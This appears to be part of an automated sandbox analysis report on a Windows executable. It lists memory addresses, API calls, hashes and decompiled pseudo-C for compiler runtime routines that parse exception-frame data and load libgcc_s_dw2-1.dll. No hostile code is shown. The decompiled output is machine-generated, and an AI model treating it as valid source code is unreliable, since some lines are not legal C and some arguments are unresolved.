0x013d99e2
0x013d99e2
0x00000000
0x00000000
0x00000000
0x00000000
0x013d99e2
0x013d9970
0x013d9970
0x013d9970
0x013d9973
0x013d9975
0x013d9977
0x00000000
0x00000000
0x00000000
0x013d9977
0x013d9961
0x013d994a
0x013d9942
0x013d993c
0x013d9931
0x013d991c
0x013d990b
0x00000000
0x013d98fd
0x013d999e
0x013d99a1
0x013d99a2
0x013d99a3
0x013d99a4
0x013d99a5
0x00000000
0x013d9979
0x013d9979
0x013d997d
0x013d997f
0x013d9981
0x013d9983
0x013d9986
0x013d9986
0x013d9989
0x013d998c
0x013d998c
0x00000000
0x013d9981
0x013d99e4
0x013d99e4
0x013d99e4
0x00000000
0x013d9b02
0x00000000

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 17f18fc91c1f702e0dfddc2a8175c5da486ba8cd484d9f9137554c20b9508da6
Instruction ID: b49c97d42fef33dc860ea4959302dc688038ec588b8e67abfda93de8bdefa4ce
Opcode Fuzzy Hash: 17f18fc91c1f702e0dfddc2a8175c5da486ba8cd484d9f9137554c20b9508da6
Instruction Fuzzy Hash: 32B01232C4922EC9CC207D7C01041BEE2BD966B14DB85710BC4AB734458631E803630F

Uniqueness

Uniqueness Score: -1.00%

Function 014631F0 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0146326D
memcpy.MSVCRT ref: 014632AC

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9184eb8914d6e3432625457f0b529d73ab70f2eece82a4a62ea886e5666b1359
Instruction ID: 8cd4bbd27ebeb54d85637b27c28b317e8117ea6bef5d8fe3e7d2cc685ffa07c1
Opcode Fuzzy Hash: 9184eb8914d6e3432625457f0b529d73ab70f2eece82a4a62ea886e5666b1359
Instruction Fuzzy Hash: 2A61C3B4908742CFC718DF19C19052AFBE4BF99758F14C91EE8A98B7A1D730E885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013D9B20 Relevance: 9.2, APIs: 6, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E013D9B20(unsigned short __eax, intOrPtr __ecx, CHAR* __edx) {
				void* _v16;
				char _v32;
				signed int _v36;
				signed char _v45;
				intOrPtr _v52;
				signed int _v56;
				unsigned short _v60;
				unsigned short _v64;
				char* _v132;
				unsigned short _t64;
				signed int _t66;
				signed int _t69;
				void* _t73;
				signed int _t77;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t82;
				_Unknown_base(*)()* _t83;
				struct HINSTANCE__* _t86;
				_Unknown_base(*)()* _t87;
				signed int _t89;
				void* _t92;
				signed int _t96;
				void* _t101;
				CHAR* _t107;
				struct HINSTANCE__* _t108;
				char _t121;
				signed int _t133;
				unsigned short _t135;
				char _t138;
				_Unknown_base(*)()* _t139;
				signed int _t140;
				void* _t142;
				intOrPtr* _t143;
				char** _t146;
				char** _t147;
				struct HINSTANCE__** _t149;
				struct HINSTANCE__** _t150;

				_t107 = __edx;
				_t143 = _t142 - 0x4c;
				_v64 = __eax;
				_t64 =  *(__eax + 0x10) & 0x0000ffff;
				_v52 = __ecx;
				_v60 = _t64;
				if(_t64 >> 3 == 0xff) {
					_v56 = 0;
					_t140 = 0xff;
					goto L11;
				} else {
					__eax = __eax & 0x00000070;
					__eflags = __al - 0x20;
					if(__eflags == 0) {
						__eax = _v64;
						__eax =  *(_v64 + 4);
						_v56 = __eax;
						goto L11;
					} else {
						if(__eflags <= 0) {
							L40:
							_v56 = 0;
							goto L11;
						} else {
							__eflags = __al - 0x30;
							if(__al != 0x30) {
								__eflags = __al - 0x50;
								if(__al != 0x50) {
									goto L51;
								} else {
									goto L40;
								}
							} else {
								__eax = _v64;
								__eax =  *(_v64 + 8);
								_v56 = __eax;
								L11:
								_t138 =  *_t107;
								_v60 = 0;
								__eflags = _t138;
								if(_t138 != 0) {
									do {
										_t66 = _t107[4];
										__eflags = _t66;
										if(_t66 == 0) {
											goto L22;
										} else {
											_t135 = _v64;
											__eflags =  *(_t135 + 0x10) & 0x00000004;
											if(( *(_t135 + 0x10) & 0x00000004) != 0) {
												_t13 =  &(_t107[4]); // 0x5
												_t135 = _t13 - _t66;
												__eflags = _t135 - _v60;
												if(_t135 == _v60) {
													goto L25;
												} else {
													_t89 = E013D91E0(_t135);
													_v45 = _t89;
													_t140 = _t89;
													__eflags = _t89 - 0xff;
													if(_t89 == 0xff) {
														_t55 =  &(_t107[8]); // 0x9
														 *_t143 =  &_v36;
														_t92 = E013D9050(0xff, _t55, 0);
														 *_t143 =  &_v32;
														E013D9050(_t140 & 0x0000000f, _t92, 0);
														_v60 = _t135;
														_v56 = 0;
														goto L22;
													} else {
														_t96 = _t89 & 0x00000070;
														__eflags = _t96 - 0x20;
														if(__eflags == 0) {
															_v60 = _t135;
															_v56 =  *(_v64 + 4);
															__eflags = _t140;
															if(_t140 == 0) {
																goto L20;
															} else {
																goto L44;
															}
														} else {
															if(__eflags <= 0) {
																L35:
																_v60 = _t135;
																_v56 = 0;
																__eflags = _t140;
																if(_t140 == 0) {
																	goto L20;
																} else {
																	goto L26;
																}
															} else {
																__eflags = _t96 - 0x30;
																if(_t96 != 0x30) {
																	__eflags = _t96 - 0x50;
																	if(_t96 != 0x50) {
																		goto L51;
																	} else {
																		goto L35;
																	}
																} else {
																	_v60 = _t135;
																	_v56 =  *(_v64 + 8);
																	__eflags = _t140;
																	if(_t140 != 0) {
																		L44:
																		_t51 =  &(_t107[8]); // 0x9
																		 *_t143 =  &_v36;
																		_t101 = E013D9050(_t140 & 0x000000ff, _t51, _v56);
																		 *_t143 =  &_v32;
																		E013D9050(_t140 & 0x0000000f, _t101, 0);
																		goto L27;
																	} else {
																		goto L20;
																	}
																}
															}
														}
													}
												}
											} else {
												L25:
												__eflags = _t140;
												if(_t140 == 0) {
													L20:
													_t69 = _t107[8];
													_t121 = _t107[0xc];
													_t140 = 0;
													_v36 = _t69;
													_v32 = _t121;
													__eflags = _t69;
													if(_t69 == 0) {
														goto L22;
													} else {
														__eflags = _v52 - _t69 - _t121;
														if(_v52 - _t69 < _t121) {
															goto L33;
														} else {
															goto L22;
														}
													}
												} else {
													L26:
													_t33 =  &(_t107[8]); // 0x9
													 *_t143 =  &_v36;
													_t73 = E013D9050(_t140 & 0x000000ff, _t33, _v56);
													 *_t143 =  &_v32;
													E013D9050(_t140 & 0x0000000f, _t73, 0);
													_t77 = _t140;
													_v45 = _t77;
													__eflags = _t77 - 0xff;
													if(_t77 == 0xff) {
														goto L22;
													} else {
														L27:
														_t79 = _v45 & 7;
														__eflags = _t79 - 2;
														if(__eflags == 0) {
															_t133 = 0xffff;
															goto L31;
														} else {
															if(__eflags > 0) {
																__eflags = _t79 - 3 - 1;
																if(_t79 - 3 <= 1) {
																	goto L30;
																} else {
																	goto L51;
																}
															} else {
																__eflags = _t79;
																if(_t79 != 0) {
																	L51:
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	_push(_t140);
																	_push(_t135);
																	_push(_t138);
																	_t146 = _t143 - 0x1c;
																	 *_t146 = "libgcc_s_dw2-1.dll";
																	_t82 = GetModuleHandleA(_t107);
																	_t147 = _t146 - 4;
																	if(_t82 == 0) {
																		_t83 = 0x13dae40;
																		_t139 = E013DA660;
																	} else {
																		_t108 = _t82;
																		 *_t147 = "libgcc_s_dw2-1.dll";
																		_t86 = LoadLibraryA(??);
																		_t149 = _t147 - 4;
																		 *0x14f2020 = _t86;
																		_v132 = "__register_frame_info";
																		 *_t149 = _t108;
																		_t87 = GetProcAddress(??, ??);
																		_t150 = _t149 - 8;
																		_t139 = _t87;
																		_v132 = "__deregister_frame_info";
																		 *_t150 = _t108;
																		_t83 = GetProcAddress(??, ??);
																		_t147 = _t150 - 8;
																	}
																	 *0x1481004 = _t83;
																	if(_t139 != 0) {
																		_v132 = 0x14f2024;
																		 *_t147 = 0x14b3104;
																		 *_t139();
																	}
																	 *_t147 = E013C1560;
																	return E013C14A0();
																} else {
																	L30:
																	_t133 = 0xffffffff;
																	L31:
																	_t80 = _v36;
																	__eflags = _t80 & _t133;
																	if((_t80 & _t133) == 0) {
																		goto L22;
																	} else {
																		__eflags = _v52 - _t80 - _v32;
																		if(_v52 - _t80 >= _v32) {
																			goto L22;
																		} else {
																			L33:
																			return _t107;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
										goto L57;
										L22:
										_t107 =  &(_t107[_t138 + 4]);
										_t138 =  *_t107;
										__eflags = _t138;
									} while (_t138 != 0);
									goto L42;
								} else {
									L42:
									__eflags = 0;
									return 0;
								}
							}
						}
					}
				}
				L57:
			}

0x013d9b24
0x013d9b26
0x013d9b29
0x013d9b2d
0x013d9b31
0x013d9b35
0x013d9b40
0x013d9dd0
0x013d9dd8
0x00000000
0x013d9b46
0x013d9b49
0x013d9b4c
0x013d9b4e
0x013d9dc0
0x013d9dc4
0x013d9dc7
0x00000000
0x013d9b54
0x013d9b54
0x013d9d00
0x013d9d00
0x00000000
0x013d9b5a
0x013d9b5a
0x013d9b5c
0x013d9cf8
0x013d9cfa
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9b62
0x013d9b62
0x013d9b66
0x013d9b69
0x013d9b70
0x013d9b70
0x013d9b72
0x013d9b7a
0x013d9b7c
0x013d9c20
0x013d9c20
0x013d9c23
0x013d9c25
0x00000000
0x013d9c27
0x013d9c27
0x013d9c2b
0x013d9c2f
0x013d9b90
0x013d9b93
0x013d9b99
0x013d9b9b
0x00000000
0x013d9ba1
0x013d9ba3
0x013d9ba8
0x013d9bac
0x013d9bae
0x013d9bb0
0x013d9d84
0x013d9d89
0x013d9d91
0x013d9d9a
0x013d9da6
0x013d9dab
0x013d9daf
0x00000000
0x013d9bb6
0x013d9bb6
0x013d9bb9
0x013d9bbb
0x013d9d34
0x013d9d3b
0x013d9d3f
0x013d9d41
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9bc1
0x013d9bc1
0x013d9cc8
0x013d9cc8
0x013d9ccc
0x013d9cd4
0x013d9cd6
0x00000000
0x013d9cdc
0x00000000
0x013d9cdc
0x013d9bc7
0x013d9bc7
0x013d9bc9
0x013d9cc0
0x013d9cc2
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9bcf
0x013d9bd3
0x013d9bda
0x013d9bde
0x013d9be0
0x013d9d47
0x013d9d4d
0x013d9d50
0x013d9d5a
0x013d9d63
0x013d9d6f
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9be0
0x013d9bc9
0x013d9bc1
0x013d9bbb
0x013d9bb0
0x013d9c35
0x013d9c35
0x013d9c35
0x013d9c37
0x013d9bf0
0x013d9bf0
0x013d9bf3
0x013d9bf6
0x013d9bf8
0x013d9bfc
0x013d9c00
0x013d9c02
0x00000000
0x013d9c04
0x013d9c0a
0x013d9c0c
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9c0c
0x013d9c39
0x013d9c39
0x013d9c3f
0x013d9c42
0x013d9c4c
0x013d9c55
0x013d9c61
0x013d9c66
0x013d9c68
0x013d9c6c
0x013d9c6e
0x00000000
0x013d9c70
0x013d9c70
0x013d9c75
0x013d9c78
0x013d9c7a
0x013d9d10
0x00000000
0x013d9c80
0x013d9c80
0x013d9ceb
0x013d9ced
0x00000000
0x013d9cef
0x00000000
0x013d9cef
0x013d9c82
0x013d9c82
0x013d9c84
0x0147aa5d
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d9c8a
0x013d9c8a
0x013d9c8a
0x013d9c8f
0x013d9c8f
0x013d9c93
0x013d9c95
0x00000000
0x013d9c9b
0x013d9ca5
0x013d9ca7
0x00000000
0x013d9cad
0x013d9cad
0x013d9cb6
0x013d9cb6
0x013d9ca7
0x013d9c95
0x013d9c84
0x013d9c80
0x013d9c7a
0x013d9c6e
0x013d9c37
0x013d9c2f
0x00000000
0x013d9c12
0x013d9c12
0x013d9c16
0x013d9c18
0x013d9c18
0x00000000
0x013d9b82
0x013d9d20
0x013d9d23
0x013d9d29
0x013d9d29
0x013d9b7c
0x013d9b5c
0x013d9b54
0x013d9b4e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d661555c3df56b9fa11586a66e5b88a0f072f85ca881ad5fa8fad3f49890e515
Instruction ID: 46b78bbdc8378fd30cf836795521a58932b9157519c455b11b449028413e8855
Opcode Fuzzy Hash: d661555c3df56b9fa11586a66e5b88a0f072f85ca881ad5fa8fad3f49890e515
Instruction Fuzzy Hash: C6617F726083058FDB10DF2DE48036AFBE5AFC820CF498A5EE8999B315D730D946CB56

Uniqueness

Uniqueness Score: -1.00%

Function 013DB920 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

fsetpos.MSVCRT ref: 013DB958
fgetpos.MSVCRT ref: 013DB970
fflush.MSVCRT ref: 013DB98A
_fileno.MSVCRT ref: 013DB992
_filelengthi64.MSVCRT ref: 013DB99A
_errno.MSVCRT ref: 013DB9AD

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: _errno_filelengthi64_filenofflushfgetposfsetpos
String ID:
API String ID: 4183758535-0
Opcode ID: 1b7e03b02ee0543825af00a2738732e6f1d239cfa1647508a885e9a8cd3bda77
Instruction ID: 1b5c147d30e62a2822dd9b1313f918afb42fb6c173cc822fa0b5979bcf09ba1e
Opcode Fuzzy Hash: 1b7e03b02ee0543825af00a2738732e6f1d239cfa1647508a885e9a8cd3bda77
Instruction Fuzzy Hash: 371151B280835A8BC310EF29A48401FFBF4FFD6268F16491EE8E587255E2319544CB82

Uniqueness

Uniqueness Score: -1.00%

Function 013EB9A0 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 013EB9B8
strlen.MSVCRT ref: 013EB9C2
memcpy.MSVCRT ref: 013EB9DF
setlocale.MSVCRT ref: 013EB9F2
strftime.MSVCRT ref: 013EBA16
setlocale.MSVCRT ref: 013EBA28

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: de9d9c1b9ae416a618669273fd73650ed9668a44c7c77d89d6c0f16c59d019a3
Instruction ID: 53e39427f2cd42c98b272c0c82196ad1f8e1a16c3d1ba4badc0a4a4784ec613c
Opcode Fuzzy Hash: de9d9c1b9ae416a618669273fd73650ed9668a44c7c77d89d6c0f16c59d019a3
Instruction Fuzzy Hash: E411A8B49093159FD740BF69C08871EFBE4AF99604F428C2EE4C8C7351D7B898509B52

Uniqueness

Uniqueness Score: -1.00%

Function 0143F420 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0143F43D
_errno.MSVCRT ref: 0143F441
fflush.MSVCRT ref: 0143F44C
_errno.MSVCRT ref: 0143F455
_errno.MSVCRT ref: 0143F470
_errno.MSVCRT ref: 0143F477

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: _errno$fflush
String ID:
API String ID: 3480992530-0
Opcode ID: a985e5c96c0099746bed309ca11a3e261bb75d2bba9378020724a5a30f7220a4
Instruction ID: 489cc9903413b3ae7999209b0eb4b55fa26fe8522cc7d787b306d79aecf2d69b
Opcode Fuzzy Hash: a985e5c96c0099746bed309ca11a3e261bb75d2bba9378020724a5a30f7220a4
Instruction Fuzzy Hash: 6CF03C726016188BD312BF6EAC44616FBA8EFE5658F0600BAD9448B335D6719819CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 013D9CE1 Relevance: 9.0, APIs: 6, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E013D9CE1(void* __eax, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a47, signed int _a56, signed int _a60) {
				void* _v16;
				char* _v40;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				struct HINSTANCE__* _t51;
				_Unknown_base(*)()* _t52;
				struct HINSTANCE__* _t55;
				_Unknown_base(*)()* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t59;
				_Unknown_base(*)()* _t64;
				void* _t69;
				char** _t70;
				char** _t71;
				struct HINSTANCE__** _t73;
				struct HINSTANCE__** _t74;

				while(1) {
					L31:
					__eax = __eax - 3;
					__eflags = __al - 1;
					if(__al <= 1) {
						goto L24;
					} else {
						break;
					}
					do {
						L24:
						__edx = 0xffffffff;
						while(1) {
							__eax = _a56;
							__eflags = __eax & __edx;
							if((__eax & __edx) == 0) {
								continue;
							}
							L26:
							__ecx = _a40;
							__edx = _a60;
							__ecx = _a40 - __eax;
							__eflags = _a40 - __eax - _a60;
							if(_a40 - __eax >= _a60) {
								while(1) {
									L16:
									__ebx = __ebx + __esi + 4;
									__esi =  *__ebx;
									__eflags = __esi;
									if(__esi == 0) {
										break;
									}
									__eax =  *(__ebx + 4);
									__eflags = __eax;
									if(__eax == 0) {
										continue;
									} else {
										__edi = _a28;
										__eflags =  *(__edi + 0x10) & 0x00000004;
										if(( *(__edi + 0x10) & 0x00000004) != 0) {
											_t5 = __ebx + 4; // 0x5
											__edi = _t5;
											__edi = _t5 - __eax;
											__eax = _a32;
											__eflags = __edi - _a32;
											if(__edi == _a32) {
												goto L19;
											} else {
												__eax = __edi;
												__eax = E013D91E0(__edi);
												_a47 = __al;
												__ebp = __eax;
												__eflags = __al - 0xff;
												if(__al == 0xff) {
													__eax =  &_a56;
													_t46 = __ebx + 8; // 0x9
													__ecx = _t46;
													__edx = 0;
													 *__esp =  &_a56;
													__eax = 0xff;
													__eax = E013D9050(0xff, _t46, 0);
													__edx =  &_a60;
													 *__esp =  &_a60;
													__ecx = __eax;
													__eax = __ebp;
													__edx = 0;
													__ebp & 0x0000000f = E013D9050(__ebp & 0x0000000f, __ecx, 0);
													_a32 = __edi;
													_a36 = 0;
													continue;
												} else {
													__eax = __eax & 0x00000070;
													__eflags = __al - 0x20;
													if(__eflags == 0) {
														__eax = _a28;
														_a32 = __edi;
														__eax =  *(_a28 + 4);
														_a36 =  *(_a28 + 4);
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L14;
														} else {
															goto L36;
														}
													} else {
														if(__eflags <= 0) {
															L29:
															_a32 = __edi;
															_a36 = 0;
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L14;
															} else {
																goto L20;
															}
														} else {
															__eflags = __al - 0x30;
															if(__al != 0x30) {
																__eflags = __al - 0x50;
																if(__al != 0x50) {
																	L40:
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	abort();
																	_t70 = _t69 - 0x1c;
																	 *_t70 = "libgcc_s_dw2-1.dll";
																	_t51 = GetModuleHandleA(_t57);
																	_t71 = _t70 - 4;
																	if(_t51 == 0) {
																		_t52 = 0x13dae40;
																		_t64 = E013DA660;
																	} else {
																		_t59 = _t51;
																		 *_t71 = "libgcc_s_dw2-1.dll";
																		_t55 = LoadLibraryA(??);
																		_t73 = _t71 - 4;
																		 *0x14f2020 = _t55;
																		_v40 = "__register_frame_info";
																		 *_t73 = _t59;
																		_t56 = GetProcAddress(??, ??);
																		_t74 = _t73 - 8;
																		_t64 = _t56;
																		_v40 = "__deregister_frame_info";
																		 *_t74 = _t59;
																		_t52 = GetProcAddress(??, ??);
																		_t71 = _t74 - 8;
																	}
																	 *0x1481004 = _t52;
																	if(_t64 != 0) {
																		_v40 = 0x14f2024;
																		 *_t71 = 0x14b3104;
																		 *_t64();
																	}
																	 *_t71 = E013C1560;
																	return E013C14A0();
																} else {
																	goto L29;
																}
															} else {
																__eax = _a28;
																_a32 = __edi;
																__eax =  *(_a28 + 8);
																_a36 =  *(_a28 + 8);
																__eflags = __ebp;
																if(__ebp != 0) {
																	L36:
																	__edx =  &_a56;
																	__eax = __ebp;
																	_t42 = __ebx + 8; // 0x9
																	__ecx = _t42;
																	 *__esp =  &_a56;
																	__edx = _a36;
																	__eax = __al & 0x000000ff;
																	__eax = E013D9050(__al & 0x000000ff, _t42, _a36);
																	__edx =  &_a60;
																	 *__esp =  &_a60;
																	__ecx = __eax;
																	__eax = __ebp;
																	__edx = 0;
																	__ebp & 0x0000000f = E013D9050(__ebp & 0x0000000f, __ecx, 0);
																	goto L21;
																} else {
																	goto L14;
																}
															}
														}
													}
												}
											}
										} else {
											L19:
											__eflags = __ebp;
											if(__ebp == 0) {
												L14:
												__eax =  *(__ebx + 8);
												__edx =  *(__ebx + 0xc);
												__ebp = 0;
												_a56 = __eax;
												_a60 = __edx;
												__eflags = __eax;
												if(__eax == 0) {
													continue;
												} else {
													_a40 = _a40 - __eax;
													__eflags = _a40 - __eax - __edx;
													if(_a40 - __eax < __edx) {
														goto L27;
													} else {
														continue;
													}
												}
											} else {
												L20:
												__edx =  &_a56;
												__eax = __ebp;
												_t25 = __ebx + 8; // 0x9
												__ecx = _t25;
												 *__esp =  &_a56;
												__edx = _a36;
												__eax = __al & 0x000000ff;
												__eax = E013D9050(__al & 0x000000ff, _t25, _a36);
												__edx =  &_a60;
												 *__esp =  &_a60;
												__ecx = __eax;
												__eax = __ebp;
												__edx = 0;
												__ebp & 0x0000000f = E013D9050(__ebp & 0x0000000f, __ecx, 0);
												__eax = __ebp;
												_a47 = __al;
												__eflags = __al - 0xff;
												if(__al == 0xff) {
													continue;
												} else {
													L21:
													__eax = _a47 & 0x000000ff;
													__eax = _a47 & 7;
													__eflags = __al - 2;
													if(__eflags == 0) {
														__edx = 0xffff;
														__eax = _a56;
														__eflags = __eax & __edx;
														if((__eax & __edx) == 0) {
															continue;
														}
													} else {
														if(__eflags > 0) {
															goto L31;
														} else {
															goto L23;
														}
													}
												}
											}
										}
									}
									goto L46;
								}
								__esp = __esp + 0x4c;
								__eax = 0;
								__eflags = 0;
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return 0;
							} else {
								L27:
								__esp = __esp + 0x4c;
								__eax = __ebx;
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __ebx;
							}
							L46:
							goto L16;
						}
						L23:
						__eflags = __al;
					} while (__al == 0);
					goto L40;
				}
				goto L40;
			}

0x013d9ce8
0x013d9ce8
0x013d9ce8
0x013d9ceb
0x013d9ced
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9c8a
0x013d9c8a
0x013d9c8a
0x013d9c8f
0x013d9c8f
0x013d9c93
0x013d9c95
0x00000000
0x00000000
0x013d9c9b
0x013d9c9b
0x013d9c9f
0x013d9ca3
0x013d9ca5
0x013d9ca7
0x013d9c12
0x013d9c12
0x013d9c12
0x013d9c16
0x013d9c18
0x013d9c1a
0x00000000
0x00000000
0x013d9c20
0x013d9c23
0x013d9c25
0x00000000
0x013d9c27
0x013d9c27
0x013d9c2b
0x013d9c2f
0x013d9b90
0x013d9b90
0x013d9b93
0x013d9b95
0x013d9b99
0x013d9b9b
0x00000000
